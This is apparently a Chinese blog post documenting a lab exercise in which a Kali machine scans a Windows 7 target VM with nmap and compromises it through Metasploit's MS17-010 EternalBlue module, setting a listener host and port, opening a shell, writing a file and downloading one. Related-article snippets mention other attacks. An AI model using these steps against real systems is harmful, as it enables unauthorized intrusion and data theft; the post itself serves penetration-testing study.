kali攻击blue(win7)靶机

最新推荐文章于 2024-05-10 08:33:36 发布
最新推荐文章于 2024-05-10 08:33:36 发布
阅读量4.1k 收藏 52
点赞数 5
分类专栏: 笔记 渗透 文章标签: kali linux 渗透测试
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_50339832/article/details/111873595
版权

目录

配置blue IP地址(需要和kali处于同一网段,但最后一位不相同)
在这里插入图片描述
KALI的主机IP地址为:192.168.179.128(用root)
在这里插入图片描述
在KALI中ping通blue的地址,出现time即成功
在这里插入图片描述

1.找到目标靶机

nmap -p 445 192.168.179.0/24
Nmap scan report for 192.168.179.1
Host is up (0.00031s latency).

PORT STATE SERVICE
445/tcp open microsoft-ds
MAC Address: 00:50:56:C0:00:08 (VMware)

Nmap scan report for 192.168.179.2
Host is up (0.00018s latency).

PORT STATE SERVICE
445/tcp closed microsoft-ds
MAC Address: 00:50:56:E0:7F:C3 (VMware)

Nmap scan report for 192.168.179.200
Host is up (0.00041s latency).

PORT STATE SERVICE
445/tcp open microsoft-ds
MAC Address: 00:0C:29:95:34:66 (VMware)

Nmap scan report for 192.168.179.254
Host is up (0.00039s latency).

PORT STATE SERVICE
445/tcp filtered microsoft-ds
MAC Address: 00:50:56:F3:FF:D2 (VMware)

Nmap scan report for 192.168.179.128
Host is up (0.000057s latency).

PORT STATE SERVICE
445/tcp closed microsoft-ds

Nmap done: 256 IP addresses (5 hosts up) scanned in 2.47 seconds
结果:
192.168.179.1 open
192.168.179.200 open --目标靶机

2.进行漏洞探测,识别服务

nmap -p 445 -sC -sV 192.168.179.200----目标靶机

结果:
探测到目标靶机445端口为 SMB 协议,并且操作系统是 win7,机器名为 HARIS-PC

ORT STATE SERVICE VERSION
445/tcp open microsoft-ds Windows 7 Professional 7601 Service Pack 1 microsoft-ds (workgroup: WORKGROUP)
MAC Address: 00:0C:29:95:34:66 (VMware)
Service Info: Host: HARIS-PC; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|clock-skew: mean: 7h59m59s, deviation: 0s, median: 7h59m59s
|nbstat: NetBIOS name: HARIS-PC, NetBIOS user: , NetBIOS MAC: 00:0c:29:95:34:66 (VMware)
| smb-os-discovery:
| OS: Windows 7 Professional 7601 Service Pack 1 (Windows 7 Professional 6.1)
| OS CPE: cpe:/o:microsoft:windows_7::sp1:professional
| Computer name: haris-PC
| NetBIOS computer name: HARIS-PC\x00
| Workgroup: WORKGROUP\x00
| System time: 2020-12-22T17:08:36+00:00
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
| message_signing: disabled (dangerous, but default)
| smb2-security-mode:
| 2.02:
|_ Message signing enabled but not required
| smb2-time:
| date: 2020-12-22T17:08:36
|_ start_date: 2020-12-22T15:15:54

3.漏洞识别与发现

msfconsole 打开 MSF 框架(Metasploit)
在这里插入图片描述
search ms17-010 搜索永恒之蓝漏洞相关模块
在这里插入图片描述
我们需要关注两个模块
1.auxiliary/scanner/smb/smb_ms17_010 -----MS17-010 漏洞探测模块
2.exploit/windows/smb/ms17_010_eternalblue -----MS17-010 漏洞利用模块

1)探测永恒之蓝漏洞

use auxiliary/scanner/smb/smb_ms17_010
show options 查看配置选项
set rhosts 192.168.179.200 配置远程主机 IP
run 或 exploit
在这里插入图片描述

2)进行漏洞利用,获取权限

use exploit/windows/smb/ms17_010_eternalblue
show options
set rhosts 192.168.179.200(目标靶机)

在这里插入图片描述
set lhost 192.168.179.128(KALI)
在这里插入图片描述
set lport 9999
在这里插入图片描述
Run
在这里插入图片描述

3)在目标靶机写入一个文件

shell 进入远程命令行操作界面
cd …上级目录找子目录
echo 1999 > 1999.txt
在这里插入图片描述
exit
在被控主机上添加一个文件,在KALI查询dir
在这里插入图片描述在这里插入图片描述
lcd /tmp 进入本地 /tmp 目录

在这里插入图片描述
lpwd 本机当前位置
Pwd 被控主机当前位置
lcd 当前主机的位置
下载靶机文件到本地
download 123.txt
在这里插入图片描述在这里插入图片描述在这里插入图片描述在这里插入图片描述在这里插入图片描述

玉米同学
关注
  • 5
    点赞
  • 52
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
记一次Kali系统渗透靶机(物理机)的详细过程(渗透必备)
5年编程经验的老猿。
09-23 1万+
很多人对黑客可能都是这样的印象,低调的穿着,修长的手指快速的在键盘上敲击,界面各种日志不断在打印,但是你有想过黑客用的是什么操作系统吗?windows或者linux? 实际上,很多黑客用的操作系统都是Kali linux,也是一种linux的发行版。 Kali linux系统包含了600多款渗透测试工具,今天我们就给大家分享一次Kali系统渗透靶机的详细过程。...
KaLi Linux渗透攻击
weixin_64531675的博客
06-12 3321
被动攻击的思路:渗透者构造一个攻击用的Web服务器,然后将这个Web服务器的网址发给目标用户,当目标用户使用有漏洞的浏览器打开这个网址时,攻击用的Web服务器就会向浏览器发送各种攻击脚本,如果其中某个攻击脚本攻击成功的话,就会在目标主机上建立一个meterpreter会话。使用browser_autopwn2模块可以建立一个攻击用的WEB服务器,这个服务器集成了多个浏览器漏洞,可以向浏览器发送各种攻击脚本,只要有一个攻击脚本攻击成功,即可建立会话。(将该网址复制到靶机中访问)
kali linux攻击Metasploit_linux靶机
m0_51786204的博客
05-24 2694
一、环境准备 物理机:win 11 (需要安装nessuss工具:系统漏洞扫描与分析)虚拟机:kali2021;靶机metasploitable3-Linux) 二、实验步骤(蜜罐系统搭建) (一)实验准备 1、查看Ip地址并且联通测试 查看ip地址,并且相互ping通 靶机ip地址:192.168.186.138 Kali地址:192.168.186.133 2、在终端打开nmap 3、扫描目标系统Metasploitable 2的所有TCP端口 ...
Kali Linux-网络安全之-XSS 跨站脚本攻击原理及 DVWA 靶机的搭建_kali实验xss攻击
最新发布
m0_55030688的博客
05-10 848
最近很多小伙伴找我要Linux学习资料,于是我翻箱倒柜,整理了一些优质资源,涵盖视频、电子书、PPT等共享给大家!
靶机Hacknos-1
weixin_50815573的博客
02-21 1620
实验主机:Os-hackerNos靶机一台/Kali linux攻击机一台 实验网络:桥接网络 实验目标:获取靶机的Root权限 难易程度:简单 前期工作: 1:下载Virtualbox虚拟化软件 下载地址:https://www.virtualbox.org/wiki/Downloads 2:下载目标靶机并导入Virtualbox 下载地址:hackNos: Os-hackNos ~ VulnHub 将Os-hackNos-1.ova下载下来之后打开Virtualbox按下快捷键Ctrl
kali利用ftp端口(21)漏洞攻击Metasploitable2-Linux靶机(笑脸漏洞)
qq_58018041的博客
04-22 3549
#vsftpd源码包含后门漏洞#思路:开放21端口,并且vsftpd版本号为2.3.4#原理:在特定版本的vsftpd服务器程序中,被人恶意植入代码,当用户名以“:)”结尾时,服务器就会在6200端口监听,并且能够执行任意代码。攻击机:kali :192.168.111.128靶机:Metasploitable2-Linux:192.168.111.132Metasploitable 的用户名和密码均为:msfadmin。
攻击机和靶机的使用说明:kali linux和OWAS详细使用教程.pdf
04-14
攻击机和靶机的使用说明:kali linux和OWAS详细使用教程 网卡的详细配置 ## WEB服务器OWASP靶机 ### 下载地址:https://sourceforge.net/projects/owaspbwa/files/ ### web apps: http://192.168.0.113/ #### ...
kali入侵win7.txt
07-23
整合了网络众多教程,容易出错处写的较详细,便于新手测试学习。
ensp加kali实现arp欺骗攻击
04-21
本文将深入探讨如何使用Kali Linux这一专业安全操作系统,配合ENSPI(Ethernet Network Simulation Platform,以太网网络模拟平台)来实现ARP欺骗攻击,并了解这种攻击可能导致的后果。 首先,我们需要理解ARP的...
win环境下虚拟机创建及kali的安装
08-02
在win环境在怎么安装VM,创建虚拟机,以及kali的安装方法和安装步骤图示
Kali Linux WiFi攻击与防护.rar
11-03
我们攻击WIFI的第一个思路就是从保密性出发,我们希望从无线系统中获取用户的明文数据。首先,我们知道WIFI的的认证加密主要有以下四种方式:OPEN(无加密)、WEP(RC4)、WPA(TKIP)、WPA2(CCMP)。
利用Kali 完成一次简单的渗透
热门推荐
qq_50905066的博客
03-20 3万+
这里我们需要两台虚拟机。一台Kali 作为攻击机,一台Ubuntu作为靶机。 如图: 渗透的话我们需要先得到靶机的ip 地址才能进行扫描。因为是虚拟机,只要我们知道了Kali 的ip 的地址,扫描其所在网段就可以获得靶机的地址了。 如图: 通过使用Kali自带的扫描工具执行Namp -sP 192.168.161.1/24就可以扫到了。这里我们排出太小的地址和太大的地址以及攻击的地址就可以确定靶机的地址了。 在得到靶机的地址之后,我们就可以进一步扫描靶机端口,从其中获得靶机开启的端口和..
kali系统进行DoS攻击教程
pyb_123456的博客
09-14 855
设置kali系统的IP地址为192.168.2.2取得root权限设置IP地址 vim /etc/network/interfaces。
网安小白学kali——植入木马控制靶机摄像头
weixin_58457050的博客
04-30 4458
植入木马监控(钓鱼式)
网络安全分组混战靶机攻击与加固——BPlinux系列
旺仔Sec&blog
05-21 1081
具体来说,攻击者可以在FTP命令中嵌入恶意的smiley face字符(即“:)”),如果该命令被vsftpd服务器解析并执行,则会导致缓冲区溢出,进而可能执行任意代码。攻击者还可以通过修改FTP命令中的参数,来获取当前用户的密码、文件列表等敏感信息。#注:比赛中这个靶机不会开放vnc链接也不会把密码告诉你,让你自己渗透进去然后加固,然后我们就可以使用笑脸漏洞getshell然后重置root密码为123456,注意!再新建一个用户,使用新用户ssh进去然后切换回root用户就可以了,然后进行加固。
kali机利用永恒之蓝攻击win7靶机
qq_52731059的博客
11-23 818
使用0模块,用set rhost 命令设置好目标地址,show options命令查看配置信息,配置完成后使用run命令开始攻击。1、获取win7的IP地址,打开命令窗口,输入ipconfig获取IP地址。其中有0、1、2、3、4五个选项,分别代表不同的功能。可以看见存在445端口开放,这就是本次用来攻击的端口。通过扫描发现存在可利用的漏洞,继续使用0模块进行攻击。3、使用kali进入msfconsole工具。5、用3模块查找是否存在可利用的漏洞。4、查找ms7-010漏洞工具。6、使用0模块进行攻击
攻击机与靶机的文件共享、演示流程以及第三方主机的访问
Ax的博客
04-17 5271
本文主要分享攻击机与靶机互 Ping 及它们之间的文件共享操作,文章结构: 首先会介绍主机与主机之间互 Ping 作为基础部分 其次,分享主干内容:主机与靶机之间文件共享及演示流程 最后,使用自己的 PC(第三方主机)作为攻击机来访问主机的虚拟机,参与共享过程
owasp靶机kali攻击机的安装
xy_的博客
12-19 3612
【实验环境】: 目标靶机:OWASP 测试渗透机/攻击机:kali-linux OWASP的安装: 地址:https://sourceforge.net/projects/owaspbwa/files/1.2/OWASP_Broken_Web_Apps_VM_1.2.zip/download
kali入侵win7(转载)
m0_56071898的博客
05-04 5678
前言: 本文的目的并不是教会学者入侵win7主机, 而是被入侵之后怎么反制并且做好下一步的防范 以及查到攻击者的蛛丝马迹 攻击原理: 利用未修复永恒之蓝的445端口漏洞入侵目标主机 演示设备: 主机 IP kali Linux 10.11.4.3 Windows7 10.11.4.152 (win7条件为无防火墙,无杀软) 攻击前准备: 扫描目标网段 扫描目标IP 使用msf工具的aux模块来测试目标是否能被正常攻击 1.1)--->扫描目标网段
kali攻击linux靶机
03-15
Kali Linux是一种专门用于渗透测试和网络安全的操作系统。它内置了大量的安全工具,可以用于测试和评估网络的安全性。攻击Linux靶机Kali Linux的一个常见用途之一。 在使用Kali Linux攻击Linux靶机之前,首先需要明确目的和合法性。只有在合法授权的情况下,才能使用Kali Linux进行渗透测试和漏洞评估。 以下是一般的攻击步骤: 1. 信息收集:收集目标系统的相关信息,包括IP地址、开放端口、服务版本等。 2. 漏洞扫描:使用Kali Linux中的漏洞扫描工具,如Nmap、OpenVAS等,对目标系统进行漏洞扫描,发现潜在的安全漏洞。 3. 漏洞利用:根据漏洞扫描结果,选择合适的漏洞利用工具或脚本,对目标系统进行攻击。 4. 权限提升:如果成功获取了目标系统的低权限访问,可以尝试提升权限,获取更高级别的权限。 5. 持久化访问:在攻击成功后,为了长期访问目标系统,可以在目标系统上安装后门或其他持久性访问工具。 6. 清理痕迹:在攻击完成后,为了不留下痕迹,需要清理攻击过程中产生的日志和其他痕迹。 需要注意的是,攻击他人系统是非法的,除非你有合法的授权和目的。在进行任何安全测试之前,请确保已经获得了合法的授权,并遵守相关法律和道德规范。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值